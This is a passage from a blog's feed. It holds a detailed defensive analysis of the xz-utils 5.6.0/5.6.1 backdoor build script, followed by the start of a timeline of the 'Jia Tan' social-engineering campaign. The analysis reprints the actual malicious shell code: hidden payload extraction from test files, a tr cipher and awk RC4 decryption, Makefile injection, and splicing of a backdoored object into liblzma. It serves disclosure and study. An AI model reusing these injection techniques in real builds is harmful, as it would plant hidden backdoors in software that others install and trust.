U="bad-3-corrupt_lzma2.xz"
</pre>
<p>
So far, setting up environment variables.
<pre>[ ! $(uname)="Linux" ] && exit 0 # 5.6.1 only
</pre>
<p>
A line that only appears in 5.6.1, exiting when not run on Linux. In general the scripts in 5.6.0 and 5.6.1 are very similar: 5.6.1 has a few additions. We will examine the 5.6.1 script, with the additions marked. This line is an attempted robustness fix with a bug (pointed out by Jakub Wilk): there are no spaces around the <code>=</code>, making the line a no-op.
<pre>eval $zrKcVq
</pre>
<p>
The first of many odd eval statements, for variables that do not appear to be set anywhere. One possibility is that these are debug prints: when the attacker is debugging the script, setting, say, <code>zrKcVq=env</code> inserts a debug print during execution. Another possibility is that these are extension points that can be set by some other mechanism, run before this code, in the future.
<pre>if test -f config.status; then
eval $zrKcSS
eval `grep ^LD=\'\/ config.status`
eval `grep ^CC=\' config.status`
eval `grep ^GCC=\' config.status`
eval `grep ^srcdir=\' config.status`
eval `grep ^build=\'x86_64 config.status`
eval `grep ^enable_shared=\'yes\' config.status`
eval `grep ^enable_static=\' config.status`
eval `grep ^gl_path_map=\' config.status`
</pre>
<p>
If <code>config.status</code> exists, we read various variables from it into the shell, along with two extension points. Note that we are still inside the config.status check (let’s call it “if #1”) as we continue through the output.
<pre># Entirely new in 5.6.1
vs=`grep -broaF '~!:_ W' $srcdir/tests/files/ 2>/dev/null`
if test "x$vs" != "x" > /dev/null 2>&1;then
f1=`echo $vs | cut -d: -f1`
if test "x$f1" != "x" > /dev/null 2>&1;then
start=`expr $(echo $vs | cut -d: -f2) + 7`
ve=`grep -broaF '|_!{ -' $srcdir/tests/files/ 2>/dev/null`
if test "x$ve" != "x" > /dev/null 2>&1;then
f2=`echo $ve | cut -d: -f1`
if test "x$f2" != "x" > /dev/null 2>&1;then
[ ! "x$f2" = "x$f1" ] && exit 0
[ ! -f $f1 ] && exit 0
end=`expr $(echo $ve | cut -d: -f2) - $start`
eval `cat $f1 | tail -c +${start} | head -c +${end} |
tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" |
xz -F raw --lzma2 -dc`
fi
fi
fi
fi
</pre>
<p>
This section is entirely new in 5.6.1. It looks for a single test file to contain the magic texts <code>'~!:_ W'</code> and <code>'|_!{ -'</code>, extracts the bytes between them, applies a substitution cipher, decompresses the result, and evaluates the output as a shell script. This appears to be an extension mechanism, so that the next time changes are needed in this script, a new script can be added in a different test file, instead of having to <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=74b138d2a6529f2c07729d7c77b1725a8e8b16f1">make up reasons to regenerate existing binary test files</a>.
<p>
The next chunk continues with script that was present in 5.6.0.
<pre>eval $zrKccj
if ! grep -qs '\["HAVE_FUNC_ATTRIBUTE_IFUNC"\]=" 1"' config.status > /dev/null 2>&1;then
exit 0
fi
if ! grep -qs 'define HAVE_FUNC_ATTRIBUTE_IFUNC 1' config.h > /dev/null 2>&1;then
exit 0
fi
</pre>
<p>
Two different checks that <a href="https://maskray.me/blog/2021-01-18-gnu-indirect-function">GNU indirect function</a> support is enabled. If not, stop the script. The backdoor requires this functionality.
<pre>if test "x$enable_shared" != "xyes";then
exit 0
fi
</pre>
<p>
Require shared library support.
<pre>if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then
exit 0
fi
</pre>
<p>
Require an x86-64 Linux system.
<pre>if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc64_fast.c > /dev/null 2>&1; then
exit 0
fi
if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc32_fast.c > /dev/null 2>&1; then
exit 0
fi
if ! grep -qs "$R" $srcdir/src/liblzma/check/crc_x86_clmul.h > /dev/null 2>&1; then
exit 0
fi
if ! grep -qs "$x" $srcdir/src/liblzma/check/crc_x86_clmul.h > /dev/null 2>&1; then
exit 0
fi
</pre>
<p>
Require all the crc ifunc code (in case it has been patched out?).
<pre>if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
exit 0
fi
if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
exit 0
fi
LDv=$LD" -v"
if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
exit 0
fi
</pre>
<p>
Require gcc (not clang, I suppose) and GNU ld.
<pre>if ! test -f "$srcdir/tests/files/$p" > /dev/null 2>&1;then
exit 0
fi
if ! test -f "$srcdir/tests/files/$U" > /dev/null 2>&1;then
exit 0
fi
</pre>
<p>
Require the backdoor-containing test files. Of course, if these files didn’t exist, it’s unclear how we obtained this script in the first place, but better safe than sorry, I suppose.
<pre>if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then
eval $zrKcst
</pre>
<p>
Add a bunch of checks when the file <code>debian/rules</code> exists or <code>$RPM_ARCH</code> is set to <code>x86_64</code>. Note that we are now inside two <code>if</code> statements: the <code>config.status</code> check above, and this one (let’s call it “if #2”).
<pre>j="^ACLOCAL_M4 = \$(top_srcdir)\/aclocal.m4"
if ! grep -qs "$j" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
z="^am__uninstall_files_from_dir = {"
if ! grep -qs "$z" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
w="^am__install_max ="
if ! grep -qs "$w" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
E=$z
if ! grep -qs "$E" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
Q="^am__vpath_adj_setup ="
if ! grep -qs "$Q" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
M="^am__include = include"
if ! grep -qs "$M" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
L="^all: all-recursive$"
if ! grep -qs "$L" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
m="^LTLIBRARIES = \$(lib_LTLIBRARIES)"
if ! grep -qs "$m" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
u="AM_V_CCLD = \$(am__v_CCLD_\$(V))"
if ! grep -qs "$u" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
</pre>
<p>
Check that <code>liblzma/Makefile</code> contains all the lines that will be used as anchor points later for inserting new text into the Makefile.
<pre>if ! grep -qs "$O" libtool > /dev/null 2>&1;then
exit 0
fi
</pre>
<p>
<code>$O</code> was set at the very start of the script. This is checking that the libtool file, presumably generated during the build process, configures the compiler for a PIC (position independent code) build.
<pre>eval $zrKcTy
b="am__test = $U"
</pre>
<p>
<code>$U</code> was also set at the start of the script: <code>U="bad-3-corrupt_lzma2.xz"</code>. Real work is starting!
<pre>sed -i "/$j/i$b" src/liblzma/Makefile || true
</pre>
<p>
<code>sed -i</code> runs an in-place modification of the input file, in this case <code>liblzma/Makefile</code>. Specifically, find the <code>ACLOCAL_M4</code> line we grepped for earlier (<code>/$j/</code>) and insert the <code>am__test</code> setting from <code>$b</code> (<code>i$b</code>).
<pre>d=`echo $gl_path_map | sed 's/\\\/\\\\\\\\/g'`
b="am__strip_prefix = $d"
sed -i "/$w/i$b" src/liblzma/Makefile || true
</pre>
<p>
Shell quoting inside a quoted string inside a Makefile really is something special. This is escaping the backslashes in the tr command enough times that it will work to insert them into the Makefile after the <code>am__install_max</code> line (<code>$w</code>).
<pre>b="am__dist_setup = \$(am__strip_prefix) | xz -d 2>/dev/null | \$(SHELL)"
sed -i "/$E/i$b" src/liblzma/Makefile || true
b="\$(top_srcdir)/tests/files/\$(am__test)"
s="am__test_dir=$b"
sed -i "/$Q/i$s" src/liblzma/Makefile || true
</pre>
<p>
More added lines. It’s worth stopping for a moment to look at what’s happened so far. The script has added these lines to <code>src/liblzma/Makefile</code>:
<pre>am__test = bad-3-corrupt_lzma2.xz
am__strip_prefix = tr "\\t \\-_" " \\t_\\-"
am__dist_setup = $(am__strip_prefix) | xz -d 2>/dev/null | $(SHELL)
am__test_dir = $(top_srcdir)/tests/files/$(am__test)
</pre>
<p>
<br>
These look plausible but fall apart under closer examination: for example, <code>am__test_dir</code> is a file, not a directory. The goal here seems to be that after <code>configure</code> has run, the generated <code>Makefile</code> still looks plausibly inscrutable. And the lines have been added in scattered places throughout the <code>Makefile</code>; no one will see them all next to each other like in this display. Back to the script:
<pre>h="-Wl,--sort-section=name,-X"
if ! echo "$LDFLAGS" | grep -qs -e "-z,now" -e "-z -Wl,now" > /dev/null 2>&1;then
h=$h",-z,now"
fi
j="liblzma_la_LDFLAGS += $h"
sed -i "/$L/i$j" src/liblzma/Makefile || true
</pre>
<p>
<br>
Add <code>liblzma_la_LDFLAGS += -Wl,--sort-section=name,-X</code> to the Makefile. If the <code>LDFLAGS</code> do not already say <code>-z,now</code> or <code>-Wl,now</code>, add <code>-z,now</code>.
<p>
The “<code>-Wl,now</code>” forces <code>LD_BIND_NOW</code> behavior, in which the dynamic loader resolves all symbols at program startup time. One reason this is normally done is for security: it makes sure that the global offset table and procedure linkage tables can be marked read-only early in process startup, so that buffer overflows or write-after-free bugs cannot target those tables. However, it also has the effect of running GNU indirect function (ifunc) resolvers at startup during that resolution process, and the backdoor arranges to be called from one of those. This early invocation of the backdoor setup lets it run while the tables are still writable, allowing the backdoor to replace the entry for <code>RSA_public_decrypt</code> with its own version. But we are getting ahead of ourselves. Back to the script:
<pre>sed -i "s/$O/$C/g" libtool || true
</pre>
<p>
We checked earlier that the libtool file said <code>pic_flag=" -fPIC -DPIC"</code>. The sed command changes it to read <code>pic_flag=" -fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"</code>.
<p>
It is not clear why these additional flags are important, but in general they disable linker optimizations that could plausibly get in the way of subterfuge.
<pre>k="AM_V_CCLD = @echo -n \$(LTDEPS); \$(am__v_CCLD_\$(V))"
sed -i "s/$u/$k/" src/liblzma/Makefile || true
l="LTDEPS='\$(lib_LTDEPS)'; \\\\\n\
export top_srcdir='\$(top_srcdir)'; \\\\\n\
export CC='\$(CC)'; \\\\\n\
export DEFS='\$(DEFS)'; \\\\\n\
export DEFAULT_INCLUDES='\$(DEFAULT_INCLUDES)'; \\\\\n\
export INCLUDES='\$(INCLUDES)'; \\\\\n\
export liblzma_la_CPPFLAGS='\$(liblzma_la_CPPFLAGS)'; \\\\\n\
export CPPFLAGS='\$(CPPFLAGS)'; \\\\\n\
export AM_CFLAGS='\$(AM_CFLAGS)'; \\\\\n\
export CFLAGS='\$(CFLAGS)'; \\\\\n\
export AM_V_CCLD='\$(am__v_CCLD_\$(V))'; \\\\\n\
export liblzma_la_LINK='\$(liblzma_la_LINK)'; \\\\\n\
export libdir='\$(libdir)'; \\\\\n\
export liblzma_la_OBJECTS='\$(liblzma_la_OBJECTS)'; \\\\\n\
export liblzma_la_LIBADD='\$(liblzma_la_LIBADD)'; \\\\\n\
sed rpath \$(am__test_dir) | \$(am__dist_setup) >/dev/null 2>&1";
sed -i "/$m/i$l" src/liblzma/Makefile || true
eval $zrKcHD
</pre>
<p>
Shell quoting continues to be trippy, but we’ve reached the final change. This adds the line
<pre>AM_V_CCLD = @echo -n $(LTDEPS); $(am__v_CCLD_$(V))
</pre>
<p>
to one place in the Makefile, and then adds a long script that sets up some variables, entirely as misdirection, that ends with
<pre>sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1
</pre>
<p>
The <code>sed rpath</code> command is just as much an obfuscated <code>cat</code> as <code>sed "r\n"</code> was, but <code>-rpath</code> is a very common linker flag, so at first glance you might not notice it’s next to the wrong command. Recalling the <code>am__test</code> and related lines added above, this pipeline ends up being equivalent to:
<pre>cat ./tests/files/bad-3-corrupt_lzma2.xz |
tr "\t \-_" " \t_\-" |
xz -d |
/bin/sh
</pre>
<p>
Our old friend! We know what this does, though. It runs the very script we are currently reading in this post. <a href="https://research.swtch.com/zip">How recursive!</a>
<a class=anchor href="#make"><h2 id="make">Make</h2></a>
<p>
Instead of running during <code>configure</code> in the tarball root directory, let’s mentally re-execute the script as it would run during <code>make</code> in the <code>liblzma</code> directory. In that context, the variables at the top have been set, but all the editing we just considered was skipped over by “if #1” not finding <code>./config.status</code>. Now let’s keep executing the script.
<pre>fi
</pre>
<p>
That <code>fi</code> closes “if #2”, which checked for a Debian or RPM build. The upcoming <code>elif</code> continues “if #1”, which checked for config.status, meaning now we are executing the part of the script that matters when run during <code>make</code> in the <code>liblzma</code> directory:
<pre>elif (test -f .libs/liblzma_la-crc64_fast.o) && (test -f .libs/liblzma_la-crc32_fast.o); then
</pre>
<p>
If we see the built objects for the crc code, we are running as part of <code>make</code>. Run the following code.
<pre># Entirely new in 5.6.1
vs=`grep -broaF 'jV!.^%' $top_srcdir/tests/files/ 2>/dev/null`
if test "x$vs" != "x" > /dev/null 2>&1;then
f1=`echo $vs | cut -d: -f1`
if test "x$f1" != "x" > /dev/null 2>&1;then
start=`expr $(echo $vs | cut -d: -f2) + 7`
ve=`grep -broaF '%.R.1Z' $top_srcdir/tests/files/ 2>/dev/null`
if test "x$ve" != "x" > /dev/null 2>&1;then
f2=`echo $ve | cut -d: -f1`
if test "x$f2" != "x" > /dev/null 2>&1;then
[ ! "x$f2" = "x$f1" ] && exit 0
[ ! -f $f1 ] && exit 0
end=`expr $(echo $ve | cut -d: -f2) - $start`
eval `cat $f1 | tail -c +${start} | head -c +${end} |
tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" |
xz -F raw --lzma2 -dc`
fi
fi
fi
fi
</pre>
<p>
We start this section with another extension hook. This time the magic strings are <code>'jV!.^%'</code> and <code>'%.R.1Z'</code>. As before, there are no test files with these strings. This was for future extensibility.
<p>
On to the code shared with 5.6.0:
<pre>eval $zrKcKQ
if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc64_fast.c; then
exit 0
fi
if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc32_fast.c; then
exit 0
fi
if ! grep -qs "$R" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then
exit 0
fi
if ! grep -qs "$x" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then
exit 0
fi
</pre>
<p>
Check that the ifunc-enabled CRC source files look right. Interestingly, Lasse Collin renamed <code>crc_clmul.c</code> to <code>crc_x86_clmul.h</code> <a href="https://git.tukaani.org/?p=xz.git;a=commit;h=419f55f9dfc2df8792902b8953d50690121afeea">on 2024-01-11</a>. One has to assume that the person or team behind “Jia Tan” had been working on all this code well before then and that the first version checked <code>crc_clmul.c</code>. They were probably very annoyed when Lasse Collin accidentally broke their in-development backdoor by cleaning up the file names!
<pre>if ! grep -qs "$C" ../../libtool; then
exit 0
fi
if ! echo $liblzma_la_LINK | grep -qs -e "-z,now" -e "-z -Wl,now" > /dev/null 2>&1;then
exit 0
fi
</pre>
<p>
Check that the build configuration has the extra flags we added before.
<pre>if echo $liblzma_la_LINK | grep -qs -e "lazy" > /dev/null 2>&1;then
exit 0
fi
</pre>
<p>
Check that no one has added <code>lazy</code> to the linker options, which might override the <code>-Wl,now</code>. (This code really needs to run before the tables it patches get marked read-only!)
<pre>N=0
W=0
Y=`grep "dnl Convert it to C string syntax." $top_srcdir/m4/gettext.m4`
eval $zrKcjv
if test -z "$Y"; then
N=0
W=88664
else
N=88664
W=0
fi
</pre>
<p>
This is selecting between two different offset values depending on the content of <code>gettext.m4</code>. The distributed xz tarballs do not contain that string in <code>gettext.m4</code> (it does appear in <code>build-to-host.m4</code>), so the <code>grep</code> finds nothing, <code>$Y</code> is the empty string, and the true case of the <code>if</code> executes: <code>N=0</code> and <code>W=88664</code>.
<pre>xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" |
</pre>
<p>
I inserted a line break here. Remember the “corrupt” test file script set <code>i</code> to the large head pipeline? It’s still set here, being used inside the script extracted from that pipeline. Before, the pipeline extracted 33,707 bytes and then we kept only the final 2,475 bytes. Now we are using the entire thing, which probably means the interesting part is the prefix that we skipped before. The sed command is inserting a newline after every byte of that output, setting up for piping into the remainder of the command line:
<pre>LC_ALL=C awk '
BEGIN{
FS="\n";RS="\n";ORS="";m=256;
for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}
i=0;j=0;for(l=0;l<8192;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}
}
{
v=t["x" (NF<1?RS:$1)];
i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];
printf "%c",(v+k)%m
}' |
</pre>
<p>
I inserted another line break here. What is this? <a href="https://twitter.com/nugxperience/status/1773906926503591970">@nugxperience on Twitter recognized it</a> as an RC4-like decryption function, implemented in awk! Apparently the <code>tr</code>-based substitution cipher wasn’t secure enough for this step. This is the 5.6.1 version; the 5.6.0 version is the same except that the second loop counts to 4096 instead of 8192.
<p>
Back to the script:
<pre>xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true
</pre>
<p>
We finally made it to the end of this long line. The decrypted output is piped through xz to decompress it; the <code>--single-stream</code> flag says to stop at the end of the first xz EOF marker instead of looking for additional files on standard input. This avoids reading the section of the input that we extracted with the <code>tail</code> command before. Then the decompressed data is piped through a <code>head</code> pair that extracts either the full 88,664-byte input or zero bytes, depending on <code>gettext.m4</code> from before, and writes it to <code>liblzma_la-crc64-fast.o</code>. In our build, we are taking the full input.
<pre>if ! test -f liblzma_la-crc64-fast.o; then
exit 0
fi
</pre>
<p>
If all that failed, stop quietly.
<pre>cp .libs/liblzma_la-crc64_fast.o .libs/liblzma_la-crc64-fast.o || true
</pre>
<p>
Wait what? Oh! Notice the two different file names <code>crc64_fast</code> versus <code>crc64-fast</code>. And neither of these is the one we just extracted. These are in <code>.libs/</code>, and the one we extracted is in the current directory. This is backing up the real file (the underscored one) into a file with a very similar name (the hyphenated one).
<pre>V='#endif\n#if defined(CRC32_GENERIC) && defined(CRC64_GENERIC) &&
defined(CRC_X86_CLMUL) && defined(CRC_USE_IFUNC) && defined(PIC) &&
(defined(BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL))\n
extern int _get_cpuid(int, void*, void*, void*, void*, void*);\n
static inline bool _is_arch_extension_supported(void) { int success = 1; uint32_t r[4];
success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3], ((char*) __builtin_frame_address(0))-16);
const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19);
return success && (r[2] & ecx_mask) == ecx_mask; }\n
#else\n
#define _is_arch_extension_supported is_arch_extension_supported'
</pre>
<p>
This string <code>$V</code> begins with “<code>#endif</code>”, which is never a good sign. Let’s move on for now, but we’ll take a closer look at that text shortly.
<pre>eval $yosA
if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc64_fast.c | \
sed "/include \"crc_x86_clmul.h\"/a \\$V" | \
sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc64_fast.c\"" 2>/dev/null | \
$CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS \
$CFLAGS -r liblzma_la-crc64-fast.o -x c - $P -o .libs/liblzma_la-crc64_fast.o 2>/dev/null; then
</pre>
<p>
This <code>if</code> statement is running a pipeline of sed commands piped into <code>$CC</code> with the arguments <code>liblzma_la-crc64-fast.o</code> (adding that object as an input to the compiler) and <code>-x</code> <code>c</code> <code>-</code> (compile a C program from standard input). That is, it rebuilds an edited copy of <code>crc64_fast.c</code> (a real xz source file) and merges the extracted malicious <code>.o</code> file into the resulting object, overwriting the underscored real object file that would have been built originally for <code>crc64_fast.c</code>. The <code>sed</code> <code>1i</code> tells the compiler the file name to record in debug info, since the compiler is reading standard input—very tidy! But what are the edits?
<p>
The file starts out looking like:
<pre>...
#if defined(CRC_X86_CLMUL)
# define BUILDING_CRC64_CLMUL
# include "crc_x86_clmul.h"
#endif
...
static crc64_func_type
crc64_resolve(void)
{
return is_arch_extension_supported()
? &crc64_arch_optimized : &crc64_generic;
}
</pre>
<p>
The sed commands add an <code>_</code> prefix to the name of the function in the return condition, and then add <code>$V</code> after the <code>include</code> line, producing (with reformatting of the C code):
<pre># 0 "path/to/src/liblzma/check/crc64_fast.c"
...
#if defined(CRC_X86_CLMUL)
# define BUILDING_CRC64_CLMUL
# include "crc_x86_clmul.h"
#endif
#if defined(CRC32_GENERIC) && defined(CRC64_GENERIC) && \
defined(CRC_X86_CLMUL) && defined(CRC_USE_IFUNC) && defined(PIC) && \
(defined(BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL))
extern int _get_cpuid(int, void*, void*, void*, void*, void*);
static inline bool _is_arch_extension_supported(void) {
int success = 1;
uint32_t r[4];
success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3], ((char*) __builtin_frame_address(0))-16);
const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19);
return success && (r[2] & ecx_mask) == ecx_mask;
}
#else
#define _is_arch_extension_supported is_arch_extension_supported
#endif
...
static crc64_func_type
crc64_resolve(void)
{
return _is_arch_extension_supported()
? &crc64_arch_optimized : &crc64_generic;
}
</pre>
<p>
That is, the crc64_resolve function, which is the ifunc resolver that gets run early in dynamic loading, before the GOT and PLT have been marked read-only, is now calling the newly inserted <code>_is_arch_extension_supported</code>, which calls <code>_get_cpuid</code>. This still looks like plausible code, since this is pretty similar to <a href="https://git.tukaani.org/?p=xz.git;a=blob;f=src/liblzma/check/crc_x86_clmul.h;h=ae66ca9f8c710fd84cd8b0e6e52e7bbfb7df8c0f;hb=2d7d862e3ffa8cec4fd3fdffcd84e984a17aa429#l388">the real is_arch_extension_supported</a>. But <code>_get_cpuid</code> is provided by the backdoor .o, and it does a lot more before returning the cpuid information. In particular it rewrites the GOT and PLT to hijack calls to RSA_public_decrypt.
<p>
But let’s get back to the shell script, which is still running from inside <code>src/liblzma/Makefile</code> and just successfully inserted the backdoor into <code>.libs/liblzma_la-crc64_fast.o</code>. We are now in the <code>if</code> compiler success case:
<pre>cp .libs/liblzma_la-crc32_fast.o .libs/liblzma_la-crc32-fast.o || true
eval $BPep
if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc32_fast.c | \
sed "/include \"crc32_arm64.h\"/a \\$V" | \
sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc32_fast.c\"" 2>/dev/null | \
$CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS \
$CFLAGS -r -x c - $P -o .libs/liblzma_la-crc32_fast.o; then
</pre>
<p>
This does the same thing for <code>crc32_fast.c</code>, except it doesn’t add the backdoored object code. We don’t want two copies of that in the build. It is unclear why the script bothers to intercept both the crc32 and crc64 ifuncs; either one should have sufficed. Perhaps they wanted the dispatch code for both to look similar in a debugger. Now we’re in the doubly nested <code>if</code> compiler success case:
<pre>eval $RgYB
if $AM_V_CCLD$liblzma_la_LINK -rpath $libdir $liblzma_la_OBJECTS $liblzma_la_LIBADD; then
</pre>
<p>
If we can relink the .la file, then...
<pre>if test ! -f .libs/liblzma.so; then
mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
</pre>
<p>
If the relink succeeded but didn’t write the file, assume it failed and restore the backups.
<pre>rm -fr .libs/liblzma.a .libs/liblzma.la .libs/liblzma.lai .libs/liblzma.so* || true
</pre>
<p>
No matter what, remove the libraries. (The <code>Makefile</code> link step is presumably going to happen next and recreate them.)
<pre>else
mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
</pre>
<p>
This is the <code>else</code> for the link failing. Restore from backups.
<pre>rm -f .libs/liblzma_la-crc32-fast.o || true
rm -f .libs/liblzma_la-crc64-fast.o || true
</pre>
<p>
Now we are in the inner compiler success case. Delete backups.
<pre>else
mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
</pre>
<p>
This is the else for the crc32 compilation failing. Restore from backups.
<pre>else
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
</pre>
<p>
This is the else for the crc64 compilation failing. Restore from backup. (This is not the cleanest shell script in the world!)
<pre>rm -f liblzma_la-crc64-fast.o || true
</pre>
<p>
Now we are at the end of the Makefile section of the script. Delete the backup.
<pre>fi
eval $DHLd
$
</pre>
<p>
Close the “<code>elif</code> we’re in a Makefile”, one more extension point/debug print, and we’re done!
The script has injected the object file into the objects built during <code>make</code>, leaving no trace behind.
Timeline of the xz open source attacktag:research.swtch.com,2012:research.swtch.com/xz-timeline2024-04-01T23:23:00-04:002024-04-03T09:25:00-04:00A detailed timeline of the xz open source attack, from 2021 to 2024.
<p>
Over a period of over two years, an attacker using the name “Jia Tan”
worked as a diligent, effective contributor to the xz compression library,
eventually being granted commit access and maintainership.
Using that access, they installed a very subtle, carefully hidden backdoor into liblzma,
a part of xz that also happens to be a dependency of OpenSSH sshd
on Debian, Ubuntu, Fedora, and other systemd-based Linux systems that patch sshd to link libsystemd.
(Note that this does not include systems like Arch Linux, Gentoo, and NixOS, which do not patch sshd.)
That backdoor watches for the attacker sending hidden commands at the start of an SSH session,
giving the attacker the ability to run an arbitrary command on the target system without logging in:
unauthenticated, targeted remote code execution.
<p>
The attack was <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4">publicly disclosed on March 29, 2024</a> and
appears to be the first serious known supply chain attack on widely used open source software.
It marks a watershed moment in open source supply chain security, for better or worse.
<p>
This post is a detailed timeline that I have constructed of the
social engineering aspect of the attack, which appears to date
back to late 2021.
(See also my <a href="xz-script">analysis of the attack script</a>.)
<p>
Corrections or additions welcome on <a href="https://bsky.app/profile/swtch.com/post/3kp4my7wdom2q">Bluesky</a>, <a href="https://hachyderm.io/@rsc/112199506755478946">Mastodon</a>, or <a href="mailto:rsc@swtch.com">email</a>.
<a class=anchor href="#prologue"><h2 id="prologue">Prologue</h2></a>
<p>
<b>2005–2008</b>: <a href="https://github.com/kobolabs/liblzma/blob/87b7682ce4b1c849504e2b3641cebaad62aaef87/doc/history.txt">Lasse Collin, with help from others</a>, designs the .xz file format using the LZMA compression algorithm, which compresses files to about 70% of what gzip did [1]. Over time this format becomes widely used for compressing tar files, Linux kernel images, and many other uses.
<a class=anchor href="#jia_tan_arrives_on_scene_with_supporting_cast"><h2 id="jia_tan_arrives_on_scene_with_supporting_cast">Jia Tan arrives on scene, with supporting cast</h2></a>
<p>
<b>2021-10-29</b>: Jia Tan sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00512.html">first, innocuous patch</a> to the xz-devel mailing list, adding “.editorconfig” file.
<p>
<b>2021-11-29</b>: Jia Tan sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00519.html">second innocuous patch</a> to the xz-devel mailing list, fixing an apparent reproducible build problem. More patches that seem (even in retrospect) to be fine follow.
<p>
<b>2022-02-07</b>: Lasse Collin merges <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=6468f7e41a8e9c611e4ba8d34e2175c5dacdbeb4">first commit with “jiat0218@gmail.com” as author in git metadata</a> (“liblzma: Add NULL checks to LZMA and LZMA2 properties encoders”).
<p>
<b>2022-04-19</b>: Jia Tan sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00553.html">yet another innocuous patch</a> to the xz-devel mailing list.
<p>
<b>2022-04-22</b>: “Jigar Kumar” sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00557.html">first of a few emails</a> complaining about Jia Tan’s patch not landing. (“Patches spend years on this mailing list. There is no reason to think anything is coming soon.”) At this point, Lasse Collin has already landed four of Jia Tan’s patches, marked by “Thanks to Jia Tan” in the commit message.
<p>
<b>2022-05-19</b>: “Dennis Ens” sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00562.html">mail to xz-devel</a> asking if XZ for Java is maintained.
<p>
<b>2022-05-19</b>: Lasse Collin <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00563.html">replies</a> apologizing for slowness and adds “Jia Tan has helped me off-list with XZ Utils and he might have a bigger role in the future at least with XZ Utils. It’s clear that my resources are too limited (thus the many emails waiting for replies) so something has to change in the long term.”
<p>
<b>2022-05-27</b>: Jigar Kumar sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00565.html">pressure email</a> to patch thread. “Over 1 month and no closer to being merged. Not a surprise.”
<p>
<b>2022-06-07</b>: Jigar Kumar sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00566.html">pressure email</a> to Java thread. “Progress will not happen until there is new maintainer. XZ for C has sparse commit log too. Dennis you are better off waiting until new maintainer happens or fork yourself. Submitting patches here has no purpose these days. The current maintainer lost interest or doesn’t care to maintain anymore. It is sad to see for a repo like this.”
<p>
<b>2022-06-08</b>: Lasse Collin <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00567.html">pushes back</a>. “I haven’t lost interest but my ability to care has been fairly limited mostly due to longterm mental health issues but also due to some other things. Recently I’ve worked off-list a bit with Jia Tan on XZ Utils and perhaps he will have a bigger role in the future, we’ll see. It’s also good to keep in mind that this is an unpaid hobby project.”
<p>
